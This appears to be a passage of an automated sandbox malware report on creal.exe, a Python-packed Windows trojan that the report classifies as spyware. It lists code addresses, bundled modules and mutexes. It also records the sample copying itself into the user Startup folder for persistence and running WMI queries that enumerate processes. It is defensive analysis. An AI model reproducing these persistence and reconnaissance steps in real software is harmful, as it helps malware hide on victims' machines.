            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A0A28028_2_00007FF8E5A0A280
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597329528_2_00007FF8E5973295
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59962F028_2_00007FF8E59962F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59972D028_2_00007FF8E59972D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59D11D028_2_00007FF8E59D11D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59DA11028_2_00007FF8E59DA110
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59774B128_2_00007FF8E59774B1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59CA49028_2_00007FF8E59CA490
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E598349028_2_00007FF8E5983490
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E599E4D028_2_00007FF8E599E4D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59D33B028_2_00007FF8E59D33B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A1433028_2_00007FF8E5A14330
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A05EF028_2_00007FF8E5A05EF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59DAE7028_2_00007FF8E59DAE70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59BDDA028_2_00007FF8E59BDDA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597BDA028_2_00007FF8E597BDA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59C9D8028_2_00007FF8E59C9D80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A0FD8028_2_00007FF8E5A0FD80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E598CDE028_2_00007FF8E598CDE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A220B028_2_00007FF8E5A220B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59740B028_2_00007FF8E59740B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A310E028_2_00007FF8E5A310E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597703028_2_00007FF8E5977030
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59B901028_2_00007FF8E59B9010
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59EB06028_2_00007FF8E59EB060
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E598106028_2_00007FF8E5981060
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E598BFA028_2_00007FF8E598BFA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59CEFB028_2_00007FF8E59CEFB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E599CFE028_2_00007FF8E599CFE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A19FE028_2_00007FF8E5A19FE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5987F6028_2_00007FF8E5987F60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59D5A4028_2_00007FF8E59D5A40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59E099B28_2_00007FF8E59E099B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E599398028_2_00007FF8E5993980
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59BE99028_2_00007FF8E59BE990
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59A596028_2_00007FF8E59A5960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597A94028_2_00007FF8E597A940
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5998CB028_2_00007FF8E5998CB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5979C8028_2_00007FF8E5979C80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597FC7028_2_00007FF8E597FC70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59B3BA028_2_00007FF8E59B3BA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59ABB9128_2_00007FF8E59ABB91
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5973BC028_2_00007FF8E5973BC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A05B0028_2_00007FF8E5A05B00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59B6B4028_2_00007FF8E59B6B40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5AE18A028_2_00007FF8E5AE18A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5AE12F028_2_00007FF8E5AE12F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F3F3243028_2_00007FF8F3F32430
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F3F31FD028_2_00007FF8F3F31FD0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F6FA482028_2_00007FF8F6FA4820
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F6FA45D028_2_00007FF8F6FA45D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A024A028_2_00007FF8F7A024A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A01D8028_2_00007FF8F7A01D80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A01FF028_2_00007FF8F7A01FF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A029C028_2_00007FF8F7A029C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A02EC028_2_00007FF8F7A02EC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A0355028_2_00007FF8F7A03550
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A9211028_2_00007FF8F7A92110
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A91D4028_2_00007FF8F7A91D40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7AA1F1028_2_00007FF8F7AA1F10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7AA21C028_2_00007FF8F7AA21C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8301FA028_2_00007FF8F8301FA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83A7C3828_2_00007FF8F83A7C38
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83D098028_2_00007FF8F83D0980
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83CC48028_2_00007FF8F83CC480
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F840100028_2_00007FF8F8401000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84018E028_2_00007FF8F84018E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84012B028_2_00007FF8F84012B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8427FC928_2_00007FF8F8427FC9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8427BF028_2_00007FF8F8427BF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D5DC028_2_00007FF8F84D5DC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DD96028_2_00007FF8F84DD960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D99A028_2_00007FF8F84D99A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491FE628_2_00007FF8F8491FE6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BBD8028_2_00007FF8F84BBD80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DDE3028_2_00007FF8F84DDE30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849154128_2_00007FF8F8491541
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849159128_2_00007FF8F8491591
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84921F328_2_00007FF8F84921F3
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849149C28_2_00007FF8F849149C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84924EB28_2_00007FF8F84924EB
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84C8AA028_2_00007FF8F84C8AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491A0F28_2_00007FF8F8491A0F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84916FE28_2_00007FF8F84916FE
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8498BE028_2_00007FF8F8498BE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84FCDA028_2_00007FF8F84FCDA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849143D28_2_00007FF8F849143D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B32E028_2_00007FF8FF5B32E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B39F028_2_00007FF8FF5B39F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B2ED028_2_00007FF8FF5B2ED0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B27A028_2_00007FF8FF5B27A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5C530C28_2_00007FF8FF5C530C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8E597A550 appears 165 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F83C3880 appears 114 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F850CD8F appears 129 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF7C3CE2B30 appears 47 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8E59794B0 appears 134 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F849132A appears 235 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F850D551 appears 31 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F83C3800 appears 51 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F850CDA1 appears 544 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8E59A0F90 appears 34 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E68BA550 appears 165 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E7143800 appears 51 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E724CD8F appears 114 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF67A602B30 appears 47 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E71D132A appears 121 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E7143880 appears 114 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E68B94B0 appears 134 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E724CDA1 appears 333 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E68E0F90 appears 34 times
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.26.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.26.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: python3.dll.26.drStatic PE information: No import functions for PE file found
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs creal.exe
            Source: creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs creal.exe
            Source: creal.exe, 00000000.00000003.1594425280.0000018FDF277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32api.pyd0 vs creal.exe
            Source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs creal.exe
            Source: creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs creal.exe
            Source: creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs creal.exe
            Source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs creal.exe
            Source: creal.exeBinary or memory string: OriginalFilename vs creal.exe
            Source: creal.exe, 00000002.00000002.1589108872.00007FF8F7AA2000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1587105693.00007FF8E7E74000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs creal.exe
            Source: creal.exe, 00000002.00000002.1589666269.00007FF8F8306000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1588087474.00007FF8E8035000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1574729747.00007FF8E6EF4000.00000002.00000001.01000000.0000002D.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1590725082.00007FF8F8D87000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1587357559.00007FF8E7FAF000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1589478728.00007FF8F7EC6000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1589863582.00007FF8F875E000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1583777527.00007FF8E77C9000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1579510585.00007FF8E7134000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1588864038.00007FF8F7A0B000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1580184092.00007FF8E717E000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1590566354.00007FF8F8BC9000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs creal.exe
            Source: creal.exe, 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamelibsslH vs creal.exe
            Source: creal.exe, 00000002.00000002.1583155038.00007FF8E7783000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs creal.exe
            Source: creal.exe, 00000002.00000002.1555010440.00000185BB290000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs creal.exe
            Source: creal.exe, 00000002.00000002.1580522682.00007FF8E71BD000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs creal.exe
            Source: creal.exe, 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs creal.exe
            Source: creal.exe, 00000002.00000002.1587677037.00007FF8E8003000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs creal.exe
            Source: creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs creal.exe
            Source: creal.exe, 0000001A.00000003.1762255137.0000025EFD911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32api.pyd0 vs creal.exe
            Source: creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs creal.exe
            Source: creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs creal.exe
            Source: creal.exeBinary or memory string: OriginalFilename vs creal.exe
            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@76/190@4/5
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A608570 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF67A608570
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1760:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2572:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3972:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242Jump to behavior
            Source: creal.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\creal.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\creal.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
